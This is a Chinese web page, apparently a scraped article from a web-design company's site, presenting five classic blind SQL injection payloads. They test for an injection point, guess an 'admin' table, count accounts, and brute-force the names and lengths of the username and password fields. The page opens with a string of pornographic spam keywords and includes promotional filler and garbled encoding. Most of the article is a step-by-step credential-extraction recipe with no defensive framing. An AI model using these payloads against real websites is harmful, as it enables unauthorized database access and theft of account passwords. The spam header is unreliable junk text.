日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
SQL注入語句五例

SQL注入語句是學(xué)習(xí)SQL語句過程中需要掌握的知識,下面就為您介紹5個標(biāo)準(zhǔn)的SQL注入語句,希望對您了解SQL注入語句有所幫助。

成都創(chuàng)新互聯(lián)公司是一家集網(wǎng)站建設(shè)、做網(wǎng)站、網(wǎng)站頁面設(shè)計、網(wǎng)站優(yōu)化SEO優(yōu)化為一體的專業(yè)的建站公司,已為成都等多地近百家企業(yè)提供網(wǎng)站建設(shè)服務(wù)。追求良好的瀏覽體驗(yàn),以探求精品塑造與理念升華,設(shè)計最適合用戶的網(wǎng)站頁面。 合作只是第一步,服務(wù)才是根本,我們始終堅(jiān)持講誠信,負(fù)責(zé)任的原則,為您進(jìn)行細(xì)心、貼心、認(rèn)真的服務(wù),與眾多客戶在蓬勃發(fā)展的市場環(huán)境中,互促共生。

1.判斷有無注入點(diǎn)

 
 
 
    
  
  
  
  1. ; and 11=1 and 1=2 
    2.

2.猜表一般的表的名稱無非是admin adminuser user pass password 等..

 
 
 
    
  
  
  
  1. and 0<>(select count(*) from *)  
    2. 
  
  
  
  2. and 0<>(select count(*) from admin) ---判斷是否存在admin這張表 
    3.

3.猜帳號數(shù)目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數(shù)目就是1個

 
 
 
    
  
  
  
  1. and 0<(select count(*) from admin)  
    2. 
  
  
  
  2. and 1<(select count(*) from admin) 
    3.

4.猜解字段名稱 在len( ) 括號里面加上我們想到的字段名稱.

 
 
 
    
  
  
  
  1. and 1=(select count(*) from admin where len(*)>0)--  
    2. 
  
  
  
  2. and 1=(select count(*) from admin where len(用戶字段名稱name)>0)   
    3. 
  
  
  
  3. and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0) 
    4.

5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止

 
 
 
    
  
  
  
  1. and 1=(select count(*) from admin where len(*)>0)   
    2. 
  
  
  
  2. and 1=(select count(*) from admin where len(name)>6) 錯誤  
    3. 
  
  
  
  3. and 1=(select count(*) from admin where len(name)>5) 正確 長度是6  
    4. 
  
  
  
  4. and 1=(select count(*) from admin where len(name)=6) 正確  
    5. 
  
  
  
  5.  
    6. 
  
  
  
  6. and 1=(select count(*) from admin where len(password)>11) 正確  
    7. 
  
  
  
  7. and 1=(select count(*) from admin where len(password)>12) 錯誤 長度是12  
    8. 
  
  
  
  8. and 1=(select count(*) from admin where len(password)=12) 正確 
    9.

延伸閱讀

所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令,比如先前的很多影視網(wǎng)站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到SQL注入式攻擊.

【編輯推薦】

SQL SERVER事務(wù)的語法介紹

Sql Server視圖的概念

使用SQL查詢連續(xù)號碼段的方法

實(shí)現(xiàn)子孫樹查詢的經(jīng)典SQL語句

查詢表的字段名的sql語句寫法


分享標(biāo)題:SQL注入語句五例
鏈接分享:http://m.5511xx.com/article/ccdpjso.html